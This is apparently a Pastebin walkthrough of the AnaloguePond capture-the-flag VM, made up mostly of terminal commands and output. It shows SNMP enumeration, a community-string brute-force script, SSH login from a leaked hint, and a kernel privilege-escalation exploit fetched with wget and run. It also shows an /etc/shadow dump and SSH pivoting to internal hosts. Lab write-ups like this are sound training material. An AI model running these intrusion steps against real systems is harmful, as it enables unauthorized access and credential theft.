Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- AnaloguePond CTF Walkthrough - DigiP
- netdiscover
- 192.168.1.249 08:00:27:c0:69:94 6 360 PCS Systemtechnik GmbH
- nmap -sC -sV -T5 --open -v -p- --script vuln 192.168.1.249
- Discovered open port 22/tcp on 192.168.1.249
- 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
- #hosts file
- 127.0.0.1 analoguepond
- us -mU -Iv analoguepond:a -r 1000
- UDP open domain[ 53] from 208.67.222.222 ttl 56
- UDP open snmp[ 161] from 192.168.1.249 ttl 64
- EXTRABACON
- snmp-check -c public -v 2c 192.168.1.249
- snmp-check v1.9 - SNMP enumerator
- Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
- [+] Try to connect to 192.168.1.249:161 using SNMPv2c and community 'public'
- [*] System information:
- Host IP address : 192.168.1.249
- Hostname : analoguepond
- Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
- Contact : Eric Burdon <eric@example.com>
- Location : There is a house in New Orleans they call it...
- Uptime snmp : 00:47:17.27
- Uptime system : 00:47:06.45
- System date : 2017-4-26 02:05:41.0
- [*] Network information:
- Default TTL : noSuchObject
- TCP segments received : noSuchObject
- TCP segments sent : noSuchObject
- TCP segments retrans : noSuchObject
- Input datagrams : noSuchObject
- Delivered datagrams : noSuchObject
- Output datagrams : noSuchObject
- [*] File system information:
- Index : noSuchObject
- Mount point : noSuchObject
- Access : noSuchObject
- Bootable : noSuchObject
- onesixtyone 192.168.1.249
- Scanning 1 hosts, 2 communities
- 192.168.1.249 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
- 192.168.1.249 [public] Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
- Couldn't get onesixtyone to read multiple community strigns from file, so made my own little script.
- #!/bin/bash
- while read community
- do
- snmp-check -c $community -v 2c -w $1 #IP ex: 192.168.1.249
- sleep 3
- done < /mnt/HDD2/wordlists/communitystrings.txt
- bash snmp-brute.sh 192.168.1.249
- Only one found was public(but depends on your list and what is on the server)
- snmpwalk -v 2c -c public 192.168.1.249
- iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
- iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
- iso.3.6.1.2.1.1.3.0 = Timeticks: (622728) 1:43:47.28
- iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
- iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
- iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
- iso.3.6.1.2.1.1.7.0 = INTEGER: 72
- iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
- iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
- iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
- iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
- iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
- iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
- iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
- iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
- iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
- iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
- iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
- iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
- iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
- iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
- iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
- iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
- iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
- iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
- iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
- iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
- iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
- iso.3.6.1.2.1.25.1.1.0 = Timeticks: (623811) 1:43:58.11
- iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 04 1A 03 02 16 00 2B 01 00
- iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
- iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
- "
- iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
- iso.3.6.1.2.1.25.1.6.0 = Gauge32: 48
- iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
- iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
- Location : There is a house in New Orleans they call it...
- sshpass -f <(printf '%s\n' therisingsun) ssh eric@analoguepond
- Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)
- * Documentation: https://help.ubuntu.com/
- System information as of Wed Apr 26 03:06:56 BST 2017
- System load: 0.04 Processes: 81
- Usage of /: 82.3% of 5.39GB Users logged in: 0
- Memory usage: 35% IP address for eth0: 192.168.1.249
- Swap usage: 0% IP address for virbr0: 192.168.122.1
- Graph this data and manage this system at:
- https://landscape.canonical.com/
- New release '16.04.2 LTS' available.
- Run 'do-release-upgrade' to upgrade to it.
- eric@analoguepond:~$
- eric@analoguepond:~$ cat /etc/*ele* /etc/issue;uname -a
- DISTRIB_ID=Ubuntu
- DISTRIB_RELEASE=14.04
- DISTRIB_CODENAME=trusty
- DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
- NAME="Ubuntu"
- VERSION="14.04.5 LTS, Trusty Tahr"
- ID=ubuntu
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 14.04.5 LTS"
- VERSION_ID="14.04"
- HOME_URL="http://www.ubuntu.com/"
- SUPPORT_URL="http://help.ubuntu.com/"
- BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
- Ubuntu 14.04.5 LTS
- My IP: 192.168.1.249
- Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
- eric@analoguepond:~$
- eric@analoguepond:~$ ls -lashR
- .:
- total 68K
- 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 .
- 4.0K drwxr-xr-x 3 root root 4.0K Dec 13 21:11 ..
- 4.0K -rw------- 1 eric eric 47 Apr 26 03:07 .bash_history
- 4.0K -rw-r--r-- 1 eric eric 220 Dec 13 21:11 .bash_logout
- 4.0K -rw-r--r-- 1 eric eric 3.6K Dec 13 21:11 .bashrc
- 4.0K drwx------ 2 eric eric 4.0K Jan 7 18:32 .cache
- 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 .dbus
- 4.0K -rw-r--r-- 1 eric eric 675 Dec 13 21:11 .profile
- 32K -rw-rw-r-- 1 eric eric 29K Dec 18 15:44 reticulatingsplines.gif
- 4.0K -rw------- 1 eric eric 711 Jan 7 18:32 .viminfo
- ./.cache:
- total 8.0K
- 4.0K drwx------ 2 eric eric 4.0K Jan 7 18:32 .
- 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 ..
- 0 -rw-r--r-- 1 eric eric 0 Jan 7 18:32 motd.legal-displayed
- ./.dbus:
- total 12K
- 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 .
- 4.0K drwxr-xr-x 4 eric eric 4.0K Jan 7 18:33 ..
- 4.0K drwx------ 2 eric eric 4.0K Dec 18 16:21 session-bus
- ./.dbus/session-bus:
- total 16K
- 4.0K drwx------ 2 eric eric 4.0K Dec 18 16:21 .
- 4.0K drwx------ 3 eric eric 4.0K Dec 14 21:26 ..
- 4.0K -rw-rw-r-- 1 eric eric 476 Jan 7 16:44 1e9afac86f8648627311d32c585063c8-10
- 4.0K -rw-rw-r-- 1 eric eric 476 Dec 22 20:40 1e9afac86f8648627311d32c585063c8-11
- eric@analoguepond:~$
- eric@analoguepond:~$ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- libuuid:x:100:101::/var/lib/libuuid:
- syslog:x:101:104::/home/syslog:/bin/false
- messagebus:x:102:107::/var/run/dbus:/bin/false
- dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/bin/false
- landscape:x:104:110::/var/lib/landscape:/bin/false
- sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
- libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
- libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
- eric:x:1000:1000:Eric Burdon,,,:/home/eric:/bin/bash
- colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
- snmp:x:109:116::/var/lib/snmp:/bin/false
- snmptt:x:110:117:SNMP Trap Translator,,,:/var/spool/snmptt:/bin/false
- eric@analoguepond:~$ cat /etc/group
- root:x:0:
- daemon:x:1:
- bin:x:2:
- sys:x:3:
- adm:x:4:syslog,eric
- tty:x:5:
- disk:x:6:
- lp:x:7:
- mail:x:8:
- news:x:9:
- uucp:x:10:
- man:x:12:
- proxy:x:13:
- kmem:x:15:
- dialout:x:20:
- fax:x:21:
- voice:x:22:
- cdrom:x:24:eric
- floppy:x:25:
- tape:x:26:
- sudo:x:27:
- audio:x:29:
- dip:x:30:eric
- www-data:x:33:
- backup:x:34:
- operator:x:37:
- list:x:38:
- irc:x:39:
- src:x:40:
- gnats:x:41:
- shadow:x:42:
- utmp:x:43:
- video:x:44:
- sasl:x:45:
- plugdev:x:46:eric
- staff:x:50:
- games:x:60:
- users:x:100:
- nogroup:x:65534:
- libuuid:x:101:
- netdev:x:102:
- crontab:x:103:
- syslog:x:104:
- fuse:x:105:
- kvm:x:106:
- messagebus:x:107:
- mlocate:x:108:
- ssh:x:109:
- landscape:x:110:
- libvirtd:x:111:eric
- eric:x:1000:
- lpadmin:x:112:eric
- sambashare:x:113:eric
- scanner:x:114:
- colord:x:115:
- snmp:x:116:
- snmptt:x:117:
- ric@analoguepond:/var/log$ netstat -antplu
- (No info could be read for "-p": geteuid()=1000 but you should be root.)
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN -
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN -
- tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN -
- tcp 0 36 192.168.1.249:22 192.168.1.66:52778 ESTABLISHED -
- tcp6 0 0 :::22 :::* LISTEN -
- udp 0 0 0.0.0.0:42984 0.0.0.0:* -
- udp 0 0 192.168.122.1:53 0.0.0.0:* -
- udp 0 0 0.0.0.0:67 0.0.0.0:* -
- udp 0 0 0.0.0.0:68 0.0.0.0:* -
- udp 6336 0 0.0.0.0:41040 0.0.0.0:* -
- udp 0 0 0.0.0.0:161 0.0.0.0:* -
- udp6 0 0 ::1:161 :::* -
- udp6 0 0 :::39304 :::* -
- eric@analoguepond:/var/log$
- eric@analoguepond:/var/log$ nc -nv 127.0.0.1 5901
- Connection to 127.0.0.1 5901 port [tcp/*] succeeded!
- RFB 003.008
- ^C
- eric@analoguepond:/var/log$ nc -nv 127.0.0.1 5900
- Connection to 127.0.0.1 5900 port [tcp/*] succeeded!
- RFB 003.008
- ssh -L 5901:127.0.0.1:5901 -N -f -l eric 192.168.1.249
- ssh -L 5900:127.0.0.1:5900 -N -f -l eric 192.168.1.249
- We setup our forwarder to the remote system. We can now try vncviewer:
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 1405/ssh
- tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 1319/ssh LISTEN 1319/ssh
- vncviewer 127.0.0.1:5901
- Connected to RFB server, using protocol version 3.8
- Performing standard VNC authentication
- Password:
- Authentication failed
- However, we don't yet know the password.
- hydra -L /mnt/HDD2/ctf/analouge-pond/risingsun.txt –t vnc 127.0.0.1:5901
- wont connect... XD
- ssh -f -N -D 7070 eric@192.168.1.249
- proxychains nmap -sS -n -PN -p- 127.0.0.1
- ProxyChains-3.1 (http://proxychains.sf.net)
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-25 22:51 EDT
- Nmap scan report for 127.0.0.1
- Host is up (0.0000040s latency).
- Not shown: 65531 closed ports
- PORT STATE SERVICE
- 111/tcp open rpcbind
- 5900/tcp open vnc
- 5901/tcp open vnc-1
- 7070/tcp open realserver
- Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds
- nmap -sC -sV -T5 --open --script vuln -PN -p- 127.0.0.1
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-25 22:58 EDT
- Pre-scan script results:
- | broadcast-avahi-dos:
- | Discovered hosts:
- | 224.0.0.251
- | After NULL UDP avahi packet DoS (CVE-2011-1002).
- |_ Hosts are all up (not vulnerable).
- Nmap scan report for localhost (127.0.0.1)
- Host is up (0.0000030s latency).
- Not shown: 65531 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE VERSION
- 111/tcp open rpcbind 2-4 (RPC #100000)
- | rpcinfo:
- | program version port/proto service
- | 100000 2,3,4 111/tcp rpcbind
- |_ 100000 2,3,4 111/udp rpcbind
- 5900/tcp open vnc VNC (protocol 3.8)
- |_sslv2-drown:
- 5901/tcp open vnc VNC (protocol 3.8)
- |_sslv2-drown:
- 7070/tcp open realserver?
- searchsploit Ubuntu 14.04
- Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1) | linux/local/39166.c
- We compile this locally, copy to /var/www/html and start apache2. On the victim machine, we wget the file, chmod +x, and then run it. We are now root!
- root@analoguepond:~# id
- uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)
- root@analoguepond:~#
- root@analoguepond:~# cat /etc/shadow
- root:!:17148:0:99999:7:::
- daemon:*:16652:0:99999:7:::
- bin:*:16652:0:99999:7:::
- sys:*:16652:0:99999:7:::
- sync:*:16652:0:99999:7:::
- games:*:16652:0:99999:7:::
- man:*:16652:0:99999:7:::
- lp:*:16652:0:99999:7:::
- mail:*:16652:0:99999:7:::
- news:*:16652:0:99999:7:::
- uucp:*:16652:0:99999:7:::
- proxy:*:16652:0:99999:7:::
- www-data:*:16652:0:99999:7:::
- backup:*:16652:0:99999:7:::
- list:*:16652:0:99999:7:::
- irc:*:16652:0:99999:7:::
- gnats:*:16652:0:99999:7:::
- nobody:*:16652:0:99999:7:::
- libuuid:!:16652:0:99999:7:::
- syslog:*:16652:0:99999:7:::
- messagebus:*:17148:0:99999:7:::
- dnsmasq:*:17148:0:99999:7:::
- landscape:*:17148:0:99999:7:::
- sshd:*:17148:0:99999:7:::
- libvirt-qemu:!:17148:0:99999:7:::
- libvirt-dnsmasq:!:17148:0:99999:7:::
- eric:$6$7RkXSEhf$RhH8uZkqDOnejEuCmrCo0VBEdYKWP050O.ArVW4uGxmf0ovnNbLWqKWL5iB2yT0d0GoDvkb5chjQX79pa.tcy0:17148:0:99999:7:::
- colord:*:17149:0:99999:7:::
- snmp:*:17152:0:99999:7:::
- snmptt:*:17152:0:99999:7:::
- root@analoguepond:~#
- root as of now, has no password, so ssh won't help us. We could set one, but doesn't seem like we're going to need to since the main task, is not to gain root, but complete a list of tasks the op has setup for us on the CTF.
- The VNCservers must have passwords stored locally. Hopefully we can find and read them since we are now root, or, change them to complete our tasks.
- root@analoguepond:~# cd /root
- root@analoguepond:/root# ls -lashR
- .:
- total 20K
- 4.0K drwx------ 2 root root 4.0K Jan 7 18:36 .
- 4.0K drwxr-xr-x 22 root root 4.0K Jan 7 18:42 ..
- 4.0K -rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
- 4.0K -rw------- 1 root root 237 Dec 17 09:38 flag.txt
- 4.0K -rw-r--r-- 1 root root 140 Feb 20 2014 .profile
- root@analoguepond:/root# cat flag.txt
- C'Mon Man! Y'all didn't think this was the final flag so soon...?
- Did the bright lights and big city knock you out...? If you pull
- a stunt like this again, I'll send you back to Walker...
- This is obviously troll flah #1 So keep going.
- root@analoguepond:/root#
- 2017-04-25 20:18:04.650+0000: starting up
- LC_ALL=C PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin QEMU_AUDIO_DRV=none /usr/bin/qemu-system-x86_64 -name barringsbank -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 6cf27edd-7559-d6eb-1502-d3135c807785 -no-user-config -nodefaults -device sga -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/barringsbank.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot order=c,menu=on,strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/barringsbank-1.img,if=none,id=drive-ide0-0-1,format=qcow2 -device ide-hd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=23,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:6d:93:6a,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:0,password -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x5
- char device redirected to /dev/pts/0 (label charserial0)
- /var/log/libvirt/qemu/barringsbank.log (END)
- 2017-04-25 20:18:05.470+0000: starting up
- LC_ALL=C PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin QEMU_AUDIO_DRV=none /usr/bin/qemu-system-x86_64 -name puppet -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 1024 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid 3561f84c-71c3-f16f-4a7b-9097e7d2ac39 -no-user-config -nodefaults -device sga -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/puppet.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot order=dc,menu=on,strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/puppet-1.img,if=none,id=drive-ide0-0-1,format=qcow2 -device ide-hd,bus=ide.0,unit=1,drive=drive-ide0-0-1,id=ide0-0-1 -netdev tap,fd=23,id=hostnet0 -device virtio-net-pci,netdev=hostnet0,id=net0,mac=52:54:00:5b:05:f7,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:1,password -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x4
- char device redirected to /dev/pts/6 (label charserial0)
- root@analoguepond:/var/run# ifconfig
- eth0 Link encap:Ethernet HWaddr 08:00:27:c0:69:94
- inet addr:192.168.1.249 Bcast:192.168.1.255 Mask:255.255.255.0
- inet6 addr: fe80::a00:27ff:fec0:6994/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:604576 errors:0 dropped:0 overruns:0 frame:0
- TX packets:436808 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:45181046 (45.1 MB) TX bytes:34323377 (34.3 MB)
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:65536 Metric:1
- RX packets:7669 errors:0 dropped:0 overruns:0 frame:0
- TX packets:7669 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:376210 (376.2 KB) TX bytes:376210 (376.2 KB)
- virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
- inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:812 errors:0 dropped:0 overruns:0 frame:0
- TX packets:796 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:47884 (47.8 KB) TX bytes:70860 (70.8 KB)
- vnet0 Link encap:Ethernet HWaddr fe:54:00:6d:93:6a
- inet6 addr: fe80::fc54:ff:fe6d:936a/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:2813 errors:0 dropped:0 overruns:0 frame:0
- TX packets:9567 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:500
- RX bytes:1376378 (1.3 MB) TX bytes:1621185 (1.6 MB)
- vnet1 Link encap:Ethernet HWaddr fe:54:00:5b:05:f7
- inet6 addr: fe80::fc54:ff:fe5b:5f7/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:2845 errors:0 dropped:0 overruns:0 frame:0
- TX packets:10528 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:500
- RX bytes:1270004 (1.2 MB) TX bytes:1795087 (1.7 MB)
- root@analoguepond:/var/run# ip link
- 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default
- link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
- 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
- link/ether 08:00:27:c0:69:94 brd ff:ff:ff:ff:ff:ff
- 3: virbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
- link/ether 52:54:00:b2:23:25 brd ff:ff:ff:ff:ff:ff
- 4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN mode DEFAULT group default qlen 500
- link/ether 52:54:00:b2:23:25 brd ff:ff:ff:ff:ff:ff
- 5: vnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN mode DEFAULT group default qlen 500
- link/ether fe:54:00:6d:93:6a brd ff:ff:ff:ff:ff:ff
- 6: vnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master virbr0 state UNKNOWN mode DEFAULT group default qlen 500
- link/ether fe:54:00:5b:05:f7 brd ff:ff:ff:ff:ff:ff
- root@analoguepond:/var/run# iptables
- iptables v1.4.21: no command specified
- Try `iptables -h' or 'iptables --help' for more information.
- root@analoguepond:/var/run# iptables --list
- Chain INPUT (policy ACCEPT)
- target prot opt source destination
- ACCEPT udp -- anywhere anywhere udp dpt:domain
- ACCEPT tcp -- anywhere anywhere tcp dpt:domain
- ACCEPT udp -- anywhere anywhere udp dpt:bootps
- ACCEPT tcp -- anywhere anywhere tcp dpt:bootps
- Chain FORWARD (policy ACCEPT)
- target prot opt source destination
- ACCEPT all -- anywhere 192.168.122.0/24 ctstate RELATED,ESTABLISHED
- ACCEPT all -- 192.168.122.0/24 anywhere
- ACCEPT all -- anywhere anywhere
- REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
- REJECT all -- anywhere anywhere reject-with icmp-port-unreachable
- Chain OUTPUT (policy ACCEPT)
- target prot opt source destination
- ACCEPT udp -- anywhere anywhere udp dpt:bootpc
- so another subnet from 192.168.122.0/24
- We check for nodes on the subnet.
- root@analoguepond:/var/run# nmap -sN 192.168.122.0/24
- Nmap scan report for puppet.example.com (192.168.122.2)
- PORT STATE SERVICE
- 22/tcp open|filtered ssh
- MAC Address: 52:54:00:5B:05:F7 (QEMU Virtual NIC)
- Nmap scan report for barringsbank.example.com (192.168.122.3)
- PORT STATE SERVICE
- 22/tcp open|filtered ssh
- MAC Address: 52:54:00:6D:93:6A (QEMU Virtual NIC)
- ssh eric@192.168.122.2
- The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
- ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
- Are you sure you want to continue connecting (yes/no)? yes
- Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
- +-----------------------------------------------------------------------------+
- | Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
- | most famous song |
- +-----------------------------------------------------------------------------+
- eric@192.168.122.2's password:
- is user now "sandieshaw"?
- We try : puppetonastring
- ssh sandieshaw@192.168.122.2's password:
- Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)
- * Documentation: https://help.ubuntu.com/
- System information disabled due to load higher than 1.0
- The programs included with the Ubuntu system are free software;
- the exact distribution terms for each program are described in the
- individual files in /usr/share/doc/*/copyright.
- Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
- applicable law.
- sandieshaw@puppet:~$ id
- uid=1000(sandieshaw) gid=1000(sandieshaw) groups=1000(sandieshaw),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
- sandieshaw@puppet:~$
- We nmap scan 192.168.122.2 and find port 8140 has a webrick web server on it. The victim machine does not currently have proxychains installed, but since we're root, why not install it.
- apt-get install proxychains
- ssh -f -N -D 7171 sandieshaw@192.168.122.2
- root@analoguepond:~# ssh -f -N -D 7171 sandieshaw@192.168.122.2
- +-----------------------------------------------------------------------------+
- | Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
- | most famous song |
- +-----------------------------------------------------------------------------+
- sandieshaw@192.168.122.2's password:
- root@analoguepond:~# netstat -antplu
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
- tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN 1192/dnsmasq
- tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 915/sshd
- tcp 0 0 127.0.0.1:7171 0.0.0.0:* LISTEN 6977/ssh
- tcp 0 0 127.0.0.1:5900 0.0.0.0:* LISTEN 1199/qemu-system-x8
- tcp 0 0 127.0.0.1:5901 0.0.0.0:* LISTEN 1233/qemu-system-x8
- tcp 0 0 192.168.1.249:22 192.168.1.66:52436 ESTABLISHED 5314/sshd: eric [pr
- tcp 0 0 192.168.1.249:22 192.168.1.66:52696 ESTABLISHED 5533/sshd: eric [pr
- tcp 0 0 192.168.1.249:22 192.168.1.66:52422 ESTABLISHED 5276/sshd: eric [pr
